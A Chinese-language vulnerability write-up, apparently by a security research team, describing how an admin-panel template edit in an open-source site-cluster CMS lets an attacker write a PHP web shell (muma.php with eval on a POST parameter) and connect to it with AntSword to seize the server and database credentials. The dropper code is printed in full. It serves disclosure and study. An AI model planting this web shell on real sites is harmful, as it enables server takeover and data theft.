簡介
某站群原來是我們內部自己開發使用的一套程序,後來看到很多人有相似的需求,團隊決定發布出來免費開源給大家使用。某公司某站群最新版本存在文件上傳漏洞,攻擊者可利用該漏洞獲取服務器控制權限。
適合用在什麼場景?推薦有建站基礎,懂得SEO的專業人士使用,可用於養域名養權重,關鍵詞流量站、蜘蛛池、企業站乃至個人博客都可以使用。
下載程序
官網下載:https://www.*******.com/
下載地址點擊以後跳轉此頁面,點擊下載谷歌是沒有反應的,360和ie是可以的,谷歌瀏覽器報錯Mixed Content: The site at '<URL>' was loaded over a secure connection, but the file at '<URL>' was loaded over an insecure connection. This file should be served over HTTPS. This download has been blocked. See <URL> for more details.提示遇到https和http不兼容問題
打開調試,直接點擊url就可以下載或者是改成https點擊下載就可以下載了。但是官方審核到了三級驗證中了,點擊下載沒反應就直接給駁回了。
然後我又重新在文檔做了說明,並下載了安裝包放到附件裡邊重新提交的,又要從一級審核開始。

官方大人審核,不敢多言,直接上過程。
搭建過程
下載安裝包安裝完以後, 此時登錄後台程序:
後台效果
進入後台以後:點擊系統設置->模板風格->可以下載其他模板以後,點擊編輯模板,站點選擇該模板。
複製此段程序:找到首頁模板,複製進去,點擊保存就可以了。
保存完,運行前端,會在根目錄下生成文件。
會在根目錄下生成muma.php
惡意代碼:
<?php$file=fopen("muma.php","w");//根目錄創建muma.php文件fwrite($file,'<');fwrite($file,'?');fwrite($file,'php');fwrite($file,'@eval($_POST["cmd"]);');fwrite($file,'?>');?>
運行完以後,域名+muma.php
使用蟻劍鏈接木馬,獲得服務器權限:
查看數據配置信息:
代碼分析
點擊保存,獲取到這個地址。
找到保存方法,獲取body內容,stripslashes 函數對內容反斜槓處理,對非法內容並沒有過濾。
至此,通過系統後台文件編輯,通過非法代碼,運行文件,實現寫入木馬程序執行,拿到了服務器全部權限、源碼,以及數據庫信息,造成了很嚴重的後果。
E
N
D
關
於
我
們
Tide安全團隊正式成立於2019年1月,是新潮信息旗下以互聯網攻防技術研究為目標的安全團隊,團隊致力於分享高質量原創文章、開源安全工具、交流安全技術,研究方向覆蓋網絡攻防、系統安全、Web安全、移動終端、安全開發、物聯網/工控安全/AI安全等多個領域。
團隊作為「省級等保關鍵技術實驗室」先後與哈工大、齊魯銀行、聊城大學、交通學院等多個高校名企建立聯合技術實驗室,近三年來在網絡安全技術方面開展研發項目60餘項,獲得各類自主知識產權30餘項,省市級科技項目立項20餘項,研究成果應用於產品核心技術研究、國家重點科技項目攻關、專業安全服務等。對安全感興趣的小夥伴可以加入或關注我們。
